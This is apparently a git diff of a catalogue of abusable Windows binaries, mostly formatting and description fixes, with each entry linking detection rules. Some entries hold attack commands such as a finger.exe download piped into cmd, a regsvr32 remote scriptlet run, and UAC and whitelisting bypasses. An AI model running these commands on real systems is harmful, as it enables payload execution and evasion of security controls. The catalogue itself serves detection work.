@ -22,15 +22,14 @@ Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Child process from diskshadow.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Child process from diskshadow.exe
Resources:
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---


@ -15,10 +15,10 @@ Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
- Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
Resources:
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
@ -32,4 +32,3 @@ Acknowledgement:
Handle: '@dim0x69'
- Person: Nikhil SamratAshok
Handle: '@nikhil_mitt'
---


@ -50,14 +50,14 @@ Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
Resources:
- Link: https://twitter.com/egre55/status/985994639202283520
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
@ -66,5 +66,4 @@ Acknowledgement:
- Person: egre55
Handle: '@egre55'
- Person: Mike Cary
Handle: 'grayfold3d'
---
Handle: '@grayfold3d'


@ -7,7 +7,7 @@ Commands:
- Command: eventvwr.exe
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
Category: UAC bypass
Category: UAC Bypass
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@enigma0x3'
- Person: Matt Graeber
Handle: '@mattifestation'
---


@ -29,10 +29,10 @@ Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
Resources:
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@ -41,4 +41,3 @@ Acknowledgement:
Handle: '@infosecn1nja'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@CyberRaiju'
- Person: Jimmy
Handle: '@bohops'
---


@ -1,6 +1,6 @@
---
Name: Extexport.exe
Description:
Description: Load a DLL located in the c:\test folder with a specific name.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -15,7 +15,7 @@ Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path
@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---


@ -1,6 +1,6 @@
---
Name: Extrac32.exe
Description:
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -38,9 +38,9 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -54,4 +54,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Tamir Yehuda
Handle: '@tim8288'
---


@ -1,6 +1,6 @@
---
Name: Findstr.exe
Description:
Description: Write to ADS, discover, or download files with Findstr.exe
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -36,13 +36,12 @@ Full_Path:
- Path: C:\Windows\System32\findstr.exe
- Path: C:\Windows\SysWOW64\findstr.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml
Resources:
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -1,31 +1,30 @@
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
---
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
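Review bot: Every one of the 31 old lines of this entry is shown removed and 30 are re-added, yet the only textual difference between the two copies is the dropped trailing `---` document marker, which suggests line endings or trailing whitespace were normalised at the same time; a whitespace-insensitive diff before merging would confirm that and keep the entry's line history readable. If line endings did change, a `.gitattributes` rule such as `*.yml text eol=lf` would prevent the whole file from churning again on the next edit. The content itself (`Created: 2021-08-30`, the `Detection` and `Acknowledgement` lists) is reproduced unchanged.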


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Carlos Perez
Handle: '@Carlos_Perez'
---


@ -22,9 +22,9 @@ Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
Resources:
- Link: https://twitter.com/vector_sec/status/896049052642533376
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@vector_sec'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -22,10 +22,10 @@ Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml
- IOC: cmd /c as child process of ftp.exe
Resources:
- Link: https://twitter.com/0xAmit/status/1070063130636640256
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
@ -37,5 +37,4 @@ Acknowledgement:
- Person: BennyHusted
Handle: ''
- Person: Amit Serper
Handle: '@0xAmit '
---
Handle: '@0xAmit'


@ -176,4 +176,3 @@ Resources:
Acknowledgement:
- Person: Jesus Galvez
Handle:
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -35,4 +35,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---


@ -1,6 +1,6 @@
---
Name: Ie4uinit.exe
Description:
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -17,6 +17,7 @@ Commands:
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Lior Adar
Handle:
---
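Review bot: The `OperatingSystem: Windows 10,7` line added in the first hunk of this entry uses a terse comma-joined form, whereas the other entries in this diff spell out each version separated by comma and space (e.g. `Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10`), so anything that renders or filters on this field will treat it differently. Suggest `OperatingSystem: Windows 7, Windows 10`. The same terse form appears as a context line in the pnputil entry further down, so a follow-up there would keep the two aligned. The second hunk only drops the trailing document marker.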


@ -15,10 +15,10 @@ Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
Code_Sample:
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Resources:
- Link: https://twitter.com/KyleHanslovan/status/911997635455852544
- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Kyle Hanslovan
Handle: '@kylehanslovan'
---


@ -7,7 +7,7 @@ Commands:
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -24,11 +24,11 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
Resources:
- Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
@ -39,4 +39,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Malwrologist
Handle: '@DissectMalware'
---


@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@gN3mes1s'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -56,4 +56,3 @@ Acknowledgement:
Handle: '@FortyNorthSec'
- Person: Bank Security
Handle: '@Bank_Security'
---


@ -22,10 +22,10 @@ Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
Resources:
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
- Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
@ -34,4 +34,3 @@ Acknowledgement:
Handle: '@bohops'
- Person: clem
Handle: '@clavoillotte'
---


@ -53,4 +53,3 @@ Acknowledgement:
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'
---


@ -7,7 +7,7 @@ Commands:
- Command: msbuild.exe pshell.xml
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -60,7 +60,7 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Msbuild.exe should not normally be executed on workstations
Resources:
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
@ -77,4 +77,3 @@ Acknowledgement:
Handle: '@Cneelis'
- Person: Jimmy
Handle: '@bohops'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---


@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---


@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX'
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---


@ -34,4 +34,3 @@ Acknowledgement:
Handle:
- Person: 'Xabier Ugarte-Pedrero'
Handle:
---


@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee'
- Person: Adam
Handle: '@Hexacorn'
---


@ -19,4 +19,3 @@ Detection:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---


@ -21,4 +21,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---


@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan'
- Person: Fab
Handle: '@0rbz_'
---


@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---


@ -31,4 +31,3 @@ Resources:
Acknowledgement:
- Person: Derek Johnson
Handle: ''
---


@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample:
Code_Sample:
- Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit'
- Person: Avihay eldad
Handle: '@aloneliassaf'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -40,4 +40,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -28,4 +28,3 @@ Resources:
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Leon Rodenko
Handle: '@L3m0nada'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: FireEye
Handle: '@FireEye'
---


@ -41,4 +41,3 @@ Resources:
Acknowledgement:
- Person: Grzegorz Tworek
Handle: '@0gtweet'
---


@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Eli Salem
Handle: '@elisalem9'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---


@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -36,7 +36,7 @@ Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe
Code_Sample:
- Code:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
@ -57,4 +57,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: elceef
Handle: '@elceef'
---


@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code'
- Person: ap
Handle: '@decoder_it'
---


@ -91,4 +91,3 @@ Acknowledgement:
Handle: '@404death'
- Person: Martin Ingesen
Handle: '@Mrtn9'
---


@ -1,6 +1,6 @@
---
Name: Runonce.exe
Description:
Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---


@ -1,6 +1,6 @@
---
Name: Runscripthelper.exe
Description:
Description: Execute target PowerShell script
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -18,7 +18,7 @@ Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Event 4014 - Powershell logging
- IOC: Event 400
Resources:
